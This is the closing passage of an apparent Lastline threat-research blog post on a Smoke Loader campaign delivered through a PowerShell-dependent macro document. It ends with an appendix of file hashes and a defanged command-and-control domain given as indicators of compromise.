Figure 5 shows what the analysis overview looks like when analyzing the sample discussed in this article: besides some reported structural anomalies, which are detected by our static document analysis, we can see that dynamic behaviors are exhibited only in Windows 10.

Figure 5. Analysis overview of the malicious macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16)


In this article, we analyzed a malicious macro-based document relying on a specific version of PowerShell, thereby delivering a highly sophisticated multi-component malware, Smoke Loader. This is achieved by calling a cmdlet normally not available on PowerShell as installed in Windows 7, showing once more that operating system diversity is a key requirement for successful dynamic analysis.

Appendix: IoCsdivider-2-white

The Malicious Document b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16
Smoke Loader f227820689bdc628de34cc9c21000f3d458a26bf
Monero CPU Miner 88eba5d205d85c39ced484a3aa7241302fd815e3
Zeus Trojan 54949587044a4e3732087a56bc1d36096b9f0075
GlobeImposter Ransomware f3cd914ba35a79317622d9ac47b9e4bfbc3b3b26
Smoke Loader C&C microsoftoutlook[.]bit

The post Smoke Loader Campaign: When Defense Becomes a Numbers Game appeared first on Lastline.